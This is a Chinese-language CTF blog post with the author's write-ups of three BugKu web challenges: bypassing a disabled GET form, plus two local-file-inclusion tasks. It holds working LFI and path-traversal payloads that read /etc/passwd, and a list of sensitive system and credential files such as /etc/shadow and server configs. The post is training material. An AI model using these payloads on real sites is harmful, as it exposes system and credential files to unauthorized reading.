BugKu刷题日记(web)

已于 2023-12-06 15:44:02 修改
阅读量361 收藏
点赞数 7
分类专栏: CTF WEB BugKu 文章标签: 网络安全 web安全
于 2023-11-14 23:15:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49064458/article/details/134398070
版权
WEB 同时被 3 个专栏收录
6 篇文章 0 订阅
订阅专栏
CTF
5 篇文章 0 订阅
订阅专栏
BugKu
3 篇文章 0 订阅
订阅专栏

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

文章目录

前言

日常记录一下,倒逼自己学点东西。虽然不知道有没有用,但是贵在坚持。

提示:以下是本篇文章正文内容,下面案例供参考

一、post-the-get

描述: A simple form to fill, nothing special right?

翻译:填写一张简单的表格,没有什么特别的吧?

进入页面
题目页面
页面还有提示:这个表格被打破了,换一种方式

解法一:

第一步:

查看源代码,发现提交包的方式为GET,修改为POST

<form action="/send" method="GET">
改为:
<form action="/send" method="POST">

第二步:

<input type="submit" id="sub" name="sub" value="POST" disabled="">
改为
<input type="submit" id="sub" name="sub" value="POST" >

之后点击POST提交按钮就可以得到flag了

flag:shellmates{7HE_w3B_is_w31RD}

解法二

使用BP抓包
可以看到包为

GET /send?name=1&address=1&sub=POST HTTP/1.1
Host: 82.157.146.43:18066
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://82.157.146.43:18066/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

将GET改为POST,将GET参数改为POST参数

POST /send HTTP/1.1
Host: 82.157.146.43:18066
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://82.157.146.43:18066/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
name=1&address=1&sub=POST

小结

定义和用法
method :可设置或者返回表单 method 属性值。

method 属性制订了如何发送表单数据 (表单数据提交地址在action属性中指定)。
method 属性可以是以下值:
描述
get在 URL 中添加表单数据: URL?name=value&name=value (默认)
post使用 http post方法提交表单数据

disabled :是一个 boolean(布尔) 属性。

如果使用该属性,则会禁用按钮。

被禁用的按钮是无法使用和无法点击的。

可以对 disabled 属性进行设置,使用户在满足某些条件时(比如选中复选框,等等)才能点击按钮。然后,可使用 JavaScript 来删除 disabled 属性,使该按钮变为可用的状态。

二、baby lfi

描述:What about making things a bit harder ?
让事情变得更难一点怎么样?

靶场页面
直接交代了是本地文件包含漏洞(LFI)

解题思路

  • 目录:/etc/passwd
  • 参数:language

payload

?language=/etc/passwd

hellmates{10CA1_F11e_1Nc1US10n_m4y_r3ve4l_in7Er3st1nG_iNf0Rm4t1on}

小结

一般来说文件包含首先考虑是否可以读取敏感文件信息
Linux:

/etc/passwd

/etc/group

/etc/shadow

/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件

/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置

/usr/local/app/php5/lib/php.ini //PHP相关配置

/etc/httpd/conf/httpd.conf // Apache配置文件

/etc/my.conf // mysql 配置文件

三、baby lfi 2

在这里插入图片描述

解题过程

试试同样的payload是过不去的
直接只languages 目录会报错,说非法路径。

?language=./languages/../../../../../../../etc/passwd

shellmates{yOU_M4De_yOUr_waY_7hRough_iT}

小结

“./” 代表的意思是:
./ 代表当前文件目录,某一个文件(或者目录)的查找路径是从当前目录“.”下面开始进行查找。
“…” 代表的意思是:
“..”表示上级目录

TJ-周月年
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ctf学习笔记1——bugku刷题
Xlider的博客
01-24 355
ctf新手入门,开始刷bugku的题目,记录一下学到的知识 2021-1-22 使用chrome按F12即可进入开发者模式,可以看到前端源码,并且可以修改 浏览器地址栏后直接加?aaa=bbb,可以使用get方法发送参数,参数名为aaa,值为bbb 如果要用post方法发送数据,可以使用以前做测试的时候用过的postman,postman功能还是挺强大的 php中==符号不能判断类型,在数字与字符串比较时会将字符串转化为数字进行比较,因此如果输入1b,则会将其直接转为1来进行比较 $GLOBAL
BUGKU刷题——WEB
D.MIND 的博客
12-28 292
<meta http-equiv="refresh" content="3"> 3秒之后刷新本页面或访问指定页面 < meta http-equiv="Refresh" content="秒数; url=跳转的文件或地址" > 设置http-equiv中的refresh属性,可以设置网页3秒之后刷新本页面或访问指定页面 双引号转义问题,JS的转义是使用斜杠 " / " 对于eval函数,参数需要是字符串,且为可执行的函数 eval("alert("\141\75\14
Bugku刷题记录(一)
Luiino的博客
08-22 407
其中%u7b、%u7d分别是经过URL编码的’{‘,‘}’。回顾了之前做的笔记,是Brain Fuck加密,同上,利用在线工具得到flag:flag{0d86208ac54fbf12}考虑到自己的基础还不太行,刷别的网站的题难度越来越高,有点自闭了☹,所以换个网站巩固下基础,顺便找回点自信。就出现3三种符号.!,Ook加密里头除去Ook也是这三种符号,所以估计这道题是将Ook替换了一下,直接利用。得到flag:flag{52048c453d794df1},末尾两个@去掉,估计是在加密过程中用来凑数的。
Bugku CTF】web解题记录
2302_78903258的博客
06-23 1228
记录我在Bugku CTF靶场中做的比赛真题,便于自己以后的复习。
bugku ctf刷题1
weixin_63231007的博客
03-23 474
game1 前端java游戏类题目,我们前端玩游戏的数据,总是要传给后端的,可以拦截数据包,修改数据。 先玩一局游戏,之后打开F12的network可以看见游戏数据。 score.php传输了我们的score得分,ip和sign。 查看源码可知,sign是score经过base64加密的一种形式。但是我们的得分175经过base64 加密后发现是MTc1 ,而现在的sign是ZMMTc1==,所以得知 sign = "zM" + base64(score) + "=="。 之后我们get一
Bugku做题
qq_44813849的博客
05-29 215
web题目 1、flag在index里 打开题目看到如下界面, 然后点击 看到上面的url地址http://123.206.87.240:8005/post/index.php?file=show.php中参数有file选项,让我们联想到了文件包含漏洞。 <?php $file = $_GET["file"]; ... ... include($file); ?> 我们应该...
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
bugku web题INSERT INTO注入.docx
05-16
### bugku Web题INSERT INTO注入知识点详解 #### 一、背景与目标 在CTF(Capture The Flag)比赛中,Web安全挑战是常见的题型之一。本文档中的“bugku web题INSERT INTO注入”是一个典型的利用SQL注入漏洞进行攻击...
Bugku刷题记录(二)
Luiino的博客
08-23 261
这个符号“€”没有对应的ASCII,故得到所谓奇怪的部分:“₧”,改成“{”,再在末尾加上}即为最终flag。stringfromCharCode是Javascript的函数,复制括号里头的参数进行下一步操作。即flag{ctf_tfc201717qwe}猜测是凯撒,对照ASCII码表,看前面4个。密钥密文一一对应,首先看2-H,看到第二行。即flag{xsxsbugkuadmin}最后竖着寻找合理的flag,这里没对齐。最后UniCode解码即可。
ctf-web bugku刷题(1)
农夫果园好好喝的博客
06-19 286
点开一看看得我头晕,这玩意是越蹦越快。 点开F12,flag就安静的躺在这里。 让我输入正确的答案,但是我只能输入一个数字,大概是需要修改源码。 修改为10. 点击验证,flag到手。(referer–来源伪造,x-forwarded–ip伪造,user-agent–用户浏览器,cookie–维持登录状态,用户身份识别)这个源码比较简单,就是说我们输入参数,就给flag。 使用hackbar给他参数赋值。 得到flag,就是不知道为什么有两个。和上一个题一样的界面,只不过换成了POST传参。 直
刷题新得5(bugku)--实际是看write up获得的一些知识点--隐写
hacker__l的博客
07-22 256
对于图片可以直接下载下来放进winhex,找其中的信息。 &amp;#107;&amp;#101;&amp;#121;&amp;#123;&amp;#121;&amp;#111;&amp;#117;&amp;#32;&amp;#97;&amp;#114;&amp;#101;&amp;#32;&amp;#114;&amp;#105;&amp;#103;&amp;#104;&
今日在bugku做题,简单取证1的记录
chenweimeimei的博客
09-09 111
使用的命令:lsadump::sam /sam:SAM /system:SYSTEM。加密方式通过查阅知道NTLM这是一种MD5加密方式。百度查答案:搜索bugku 这是一张单纯的图片。这里主要记录一下工具名称:mimikatz。果然有,对着答案来了一遍,问题解决。不知道如何提升CTF技能。
BugKu--------POST,题目作者: harry
最新发布
m0_73496792的博客
07-01 466
帮助小伙伴们完成CTF入门的小题目
BugKu刷题日记web)一
weixin_49064458的博客
03-15 951
BUGKU CTF 靶场。题目是lfi和Whois。分别是文件包含和命令执行漏洞
第五课,web攻防-BugkuCTF【post-the-get】
weixin_40114827的博客
01-03 2252
第五课,web攻防-BugkuCTF【post-the-get】
Bugku---post-the-get
2201_75556700的博客
03-08 488
2.来到题目链接,虽然给出了输入框但是提交不了,可能是源码存在了disabled限制。4.将method改为POST,删去disabled。3.提示我们寻找其他方法fn+f12,查看源码。5.修改完之后,点击页面中的POST
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值